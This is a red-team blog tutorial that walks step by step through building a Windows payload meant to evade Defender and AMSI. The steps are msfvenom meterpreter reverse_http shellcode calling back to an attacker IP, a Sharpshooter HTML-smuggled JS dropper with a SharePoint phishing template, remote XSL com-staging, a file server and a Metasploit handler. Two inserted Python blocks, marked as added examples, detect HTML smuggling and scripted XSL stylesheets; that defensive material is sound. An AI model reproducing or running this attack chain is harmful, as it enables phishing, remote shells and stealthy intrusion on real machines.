Clientside Exploitation - Tricks of the Trade 0x01 - Sharpshooter + SquibblyTwo
Hi! I hope you’re well. Today I am going to show you something that is common knowledge in the red teaming community; people use this kind of thing every day without thinking about it. However, if you’re new to security, or you’re just not involved in the industry, a lot of these techniques can appear a bit daunting and long-winded. I’m here to show that it really isn’t hard, and you don’t need Cobalt Strike to do it, despite how awesome it is.
Here is a demo of it running with Cobalt Strike.
Today I am going to show you how to:
- Create a payload that isn’t detected by Windows Defender, even with real-time protection, advanced threat protection, and AMSI
- Do all of this without Cobalt Strike, and instead with Sharpshooter + Metasploit/Msfvenom*
*If you have a problem with Metasploit Framework, I understand. It is usually associated with people who just fire exploits at random hosts in the hope of getting shells. However, I do not think that we should discard a very useful tool because of a sad minority of its users. Metasploit is a great tool when used correctly, can provide tremendous value, and it’s free!
Author Assigned Level: Wannabe
Required Skills
- Understanding of payload generation with metasploit
- Understanding of metasploit payloads
- Basic networking understanding
Disclaimer
In no way do I claim this to be my work; this is purely my take on this method, and if you want to read the original source of this information, please read it from here. This is an excellent method developed by Dominic Chell from MDSec, and I wanted to re-write this in a way I think is more concise and holistic. As a side note, some images and videos may be sourced from that article.
One of the reasons I chose to do a write-up on this, especially when very good articles have already been written by MDSec, such as Payload Generation with Sharpshooter and Freestyling with Sharpshooter, is that I feel those articles assume you already know how to use certain things, such as `--rawscfile` payload generation.
In this article, I will assume previous Metasploit + msfvenom experience, familiarity with the concept of XSLs (how to do it manually), and experience using the CLI in Linux.
This is a really easy way to generate undetectable payloads, and I am here to show you just how easy it is. If you’re already quite proficient, just scan down and read the code; I’m sure most of you are just skim reading this article anyway.
Prerequisites
Something to keep in mind:
- You can only use Python 2 with Sharpshooter. It will run with Python 3, but it’ll break stuff. Don’t ask me. It only caused me about 10 hours of trouble. (not quite, but you get the idea)
- Cloned Repo + Setup of Sharpshooter
- Cloned Repo/Install of metasploit framework (Use rvm and install deps with bundler)
Generating your shellcode
You’ll need msfvenom for this task. In other examples of how to use Sharpshooter, you’ll use things like csharp byte-arrays; for this example, we’ll be using straight-up shellcode. Lucky for us, msfvenom will do this for us in one command.
Run the following:
```
./msfvenom -a x64 -p windows/x64/meterpreter/reverse_http LHOST=192.168.1.221 LPORT=443 EnableStageEncoding=True PrependMigrate=True -f raw -o shellcode.txt
```
If you’ve used msfvenom before, you’ll know that this is just generating a payload for the x64 architecture (64-bit), using the meterpreter reverse_http payload. The reverse_http payload option helps us to remain more stealthy, and slide past low-complexity packet inspection firewalls. For example, some firewalls let you allow “http” traffic. This will slide past that.
Generating your Payload
Now that you’ve generated your shellcode, place the shellcode.txt file in the same directory as SharpShooter.py. If you’re using a distro such as Arch Linux, “python” will be Python 3 by default, whereas on Ubuntu + Kali it will be Python 2 by default. You can easily verify which is true for you by running `python --version`.
Now run the following with the correct Python executable; for me, this was `python2`.
```
python2 SharpShooter.py --stageless --dotnetver 2 --payload js --output foo --rawscfile shellcode.txt --smuggle --template sharepoint --com xslremote --awlurl http://192.168.1.221:8000/foo.xsl
```
This will do multiple things. Firstly, it will create a stageless payload: it will not be staged, and therefore will have everything it needs inside the payload. This can be a bit misleading, as it will later pull a `.xsl` file; however, as far as you need to know, this is a stageless payload.
Secondly, it will specify dotnet version 2 to use. You need to ensure that the target has this version of dotnet installed; if they do not, then this will fail. Most Windows targets have at least dotnet version 2, so this is usually fine.
Next, we specify which payload type to use. In this case, I specify JS; however, we could easily also specify something such as `vba`.
After that, we use the `--smuggle` function. Some firewalls and security software block downloads of `.js` and `.vba` files; this `--smuggle` function wraps the file up inside the HTML file, encoding and encrypting it. On page load, the data is decrypted and decoded and saved as a blob. Spam filters that block malicious extensions no longer work against this. (I love this feature.) In the same breath, we specify a template; all this will do is make the page look more legitimate. In this case, we specify `sharepoint` as the template, which means that the phishing HTML will look like it is downloading from Microsoft SharePoint.
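Because the file never crosses the wire under its real extension, an extension filter has to be replaced by inspection of the HTML itself. The following is an added example (not code from the original article or from Sharpshooter) that scores a page for the behaviour described above; the indicator names, the extra extensions, the 512-character threshold and the sample pages are assumptions constructed for illustration.

```python
import re

# Script extensions the download filter is meant to stop (.js and .vba are the
# two named in the text; the rest are assumed additions).
EXT = r"(?:js|jse|vba|vbs|hta|wsf)"

INDICATORS = {
    # File content is assembled in page script instead of fetched over HTTP.
    "blob_constructed": re.compile(r"new\s+Blob\s*\("),
    # Browser APIs that hand a script-built object to the download manager.
    "programmatic_save": re.compile(
        r"msSave(?:OrOpen)?Blob|createObjectURL|\.download\s*="),
    # The save call names a file with a script extension.
    "script_filename": re.compile(
        r"""(?:msSave(?:OrOpen)?Blob\s*\([^)]*|\.download\s*=\s*)"""
        r"""["'][^"']{1,64}\.%s["']""" % EXT, re.I),
    # Long base64-looking literal: the embedded, encoded file.
    "encoded_literal": re.compile(r"""["'][A-Za-z0-9+/=]{512,}["']"""),
    # Decode step that runs in the browser.
    "decode_call": re.compile(r"\batob\s*\(|fromCharCode|charCodeAt"),
}

def score_html(html):
    """Return (verdict, sorted names of the indicators that matched)."""
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(html))
    core = {"blob_constructed", "programmatic_save"} <= set(hits)
    if core and ("script_filename" in hits or "encoded_literal" in hits):
        return "likely-smuggling", hits
    return ("review" if core else "clean"), hits

# Constructed samples (inert): a page that rebuilds and saves foo.js, an
# ordinary CSV export that uses the same APIs, and a plain link.
SMUGGLED = ('<script>var d="' + "QUJD" * 200 + '";var b=new Blob([atob(d)]);'
            'navigator.msSaveBlob(b,"foo.js");</script>')
CSV_EXPORT = ('<script>var b=new Blob([csv]);a.href=URL.createObjectURL(b);'
              'a.download="report.csv";</script>')
PLAIN = '<a href="/docs/report.pdf">Report</a>'

if __name__ == "__main__":
    for name, page in (("smuggled", SMUGGLED), ("csv", CSV_EXPORT), ("plain", PLAIN)):
        print(name, *score_html(page))
```

The CSV export case lands in "review" rather than "clean" on purpose: legitimate pages use the same browser APIs, so the file name and the embedded literal are what separate the two.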
Now we get to the exciting bit, com-staging. Com-staging is a term coined by Dom Chell from MDSec. To break it down, some Microsoft applications, such as Outlook, have functions that allow you to run shell commands, such as `obj.CreateObject("Wscript.shell").run("fun commands")`. This is leveraged by Sharpshooter, and in this case, it is leveraging WMI to execute code from an XSL file.
Next, we need to specify our `--awlurl`; this will be where the XSL file is located. In my case, I have specified `http://myip:8000/file.xsl`, because the file is placed into the `output` folder by default, and I am going to run a Python HTTP server in there.
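Since the second stage is an XSL file fetched over HTTP, stylesheets captured at a proxy or found on disk can be checked for embedded script. This is an added example, not code from the original article or from Sharpshooter; it assumes the stylesheet carries its code in Microsoft's `msxsl:script` extension element (the article does not show the generated file), and the sample stylesheets and the list of flagged calls are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET  # stdlib so this runs stand-alone; use a
                                    # hardened parser for hostile XML at scale

XSLT_NS = "http://www.w3.org/1999/XSL/Transform"
MSXSL_NS = "urn:schemas-microsoft-com:xslt"  # Microsoft script extension
RISKY = re.compile(r"ActiveXObject|CreateObject|GetObject|WScript\.\w+")

def inspect_xsl(text):
    """Return one finding per embedded script block, or None if not XSL."""
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return None
    if root.tag not in ("{%s}stylesheet" % XSLT_NS, "{%s}transform" % XSLT_NS):
        return None
    findings = []
    for el in root.iter("{%s}script" % MSXSL_NS):
        body = "".join(el.itertext())
        findings.append({
            "language": el.get("language", "unspecified"),
            "chars": len(body),
            "risky_calls": sorted({m.group(0) for m in RISKY.finditer(body)}),
        })
    return findings

# Constructed samples. The script body is an inert placeholder.
SCRIPTED = """<xsl:stylesheet version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="urn:example">
 <xsl:output method="text"/>
 <ms:script implements-prefix="user" language="JScript"><![CDATA[
   var o = new ActiveXObject("Example.Placeholder");
 ]]></ms:script>
</xsl:stylesheet>"""
PLAIN = """<xsl:stylesheet version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
 <xsl:template match="/"><xsl:value-of select="."/></xsl:template>
</xsl:stylesheet>"""

if __name__ == "__main__":
    for name, doc in (("scripted", SCRIPTED), ("plain", PLAIN), ("junk", "<html")):
        print(name, inspect_xsl(doc))
```

Any non-empty result is worth a look on its own, because ordinary stylesheets rarely need script at all; the flagged calls only help with triage.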
Serving up our Malicious files…
`cd` into the `./output` directory, and run:
```
python3 -m http.server
```
This will create a basic python web server on port 8000, inside this directory.
Now, in another window, start your Metasploit handler.
```
sudo -E ./msfconsole
use exploit/multi/handler
set LHOST 192.168.1.221
set LPORT 443
set PAYLOAD windows/x64/meterpreter/reverse_http
set ExitOnSession false
exploit -j
```
Now you should have a reverse_http handler started. Simply ensure that ports 8000 and 443 are open, then navigate to `http://yourip:8000/foo.html`. You should be able to open the files, and should receive a shell!
Conclusion
Sharpshooter + SquibblyTwo with Com-staging is working an absolute treat to bypass AMSI, for now. Let’s see how long this lasts; for now, though, we should abuse the hell out of this in red team assessments + advanced pentests. In future articles, I may begin to examine macOS security and more… Stay tuned!